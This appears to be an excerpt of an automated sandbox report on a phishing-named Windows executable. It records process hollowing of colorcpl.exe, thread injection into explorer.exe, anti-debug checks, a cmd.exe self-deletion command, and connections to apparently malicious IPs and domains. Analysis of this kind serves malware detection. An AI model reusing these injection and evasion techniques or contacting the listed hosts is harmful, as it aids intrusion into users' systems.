          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0465F716 mov eax, dword ptr fs:[00000030h]14_2_0465F716
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046F131B mov eax, dword ptr fs:[00000030h]14_2_046F131B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046CFF10 mov eax, dword ptr fs:[00000030h]14_2_046CFF10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046CFF10 mov eax, dword ptr fs:[00000030h]14_2_046CFF10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0470070D mov eax, dword ptr fs:[00000030h]14_2_0470070D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0470070D mov eax, dword ptr fs:[00000030h]14_2_0470070D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046603E2 mov eax, dword ptr fs:[00000030h]14_2_046603E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046603E2 mov eax, dword ptr fs:[00000030h]14_2_046603E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046603E2 mov eax, dword ptr fs:[00000030h]14_2_046603E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046603E2 mov eax, dword ptr fs:[00000030h]14_2_046603E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046603E2 mov eax, dword ptr fs:[00000030h]14_2_046603E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046603E2 mov eax, dword ptr fs:[00000030h]14_2_046603E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046737F5 mov eax, dword ptr fs:[00000030h]14_2_046737F5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046B53CA mov eax, dword ptr fs:[00000030h]14_2_046B53CA
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046B53CA mov eax, dword ptr fs:[00000030h]14_2_046B53CA
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04705BA5 mov eax, dword ptr fs:[00000030h]14_2_04705BA5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046F138A mov eax, dword ptr fs:[00000030h]14_2_046F138A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04641B8F mov eax, dword ptr fs:[00000030h]14_2_04641B8F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04641B8F mov eax, dword ptr fs:[00000030h]14_2_04641B8F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046ED380 mov ecx, dword ptr fs:[00000030h]14_2_046ED380
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04648794 mov eax, dword ptr fs:[00000030h]14_2_04648794
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04662397 mov eax, dword ptr fs:[00000030h]14_2_04662397
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0466B390 mov eax, dword ptr fs:[00000030h]14_2_0466B390
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046B7794 mov eax, dword ptr fs:[00000030h]14_2_046B7794
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046B7794 mov eax, dword ptr fs:[00000030h]14_2_046B7794
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_046B7794 mov eax, dword ptr fs:[00000030h]14_2_046B7794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00409B50 LdrLoadDll,3_2_00409B50
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 52.58.78.16 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 64.91.246.51 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.94 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.iamstevekelsey.com
          Source: C:\Windows\explorer.exeDomain query: www.gspotworld.com
          Source: C:\Windows\explorer.exeDomain query: www.yota.store
          Source: C:\Windows\explorer.exeDomain query: www.ff4c3dgsp.xyz
          Source: C:\Windows\explorer.exeDomain query: www.newhollandpurpose.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.225.139.107 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.appleluis.host
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.adronesview.com
          Source: C:\Windows\explorer.exeDomain query: www.teelandcompany.com
          Source: C:\Windows\explorer.exeNetwork Connect: 35.215.165.29 80Jump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: 2F0000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 3292Jump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeThread register set: target process: 3292Jump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'Jump to behavior
          Source: explorer.exe, 00000004.00000000.306881169.0000000001400000.00000002.00020000.sdmp, colorcpl.exe, 0000000E.00000002.511163062.0000000002EC0000.00000002.00020000.sdmpBinary or memory string: uProgram Manager
          Source: explorer.exe, 00000004.00000000.306881169.0000000001400000.00000002.00020000.sdmp, colorcpl.exe, 0000000E.00000002.511163062.0000000002EC0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.306881169.0000000001400000.00000002.00020000.sdmp, colorcpl.exe, 0000000E.00000002.511163062.0000000002EC0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.269371688.0000000000EB8000.00000004.00000020.sdmpBinary or memory string: ProgmanX
          Source: explorer.exe, 00000004.00000000.306881169.0000000001400000.00000002.00020000.sdmp, colorcpl.exe, 0000000E.00000002.511163062.0000000002EC0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.318990974.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndAj
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
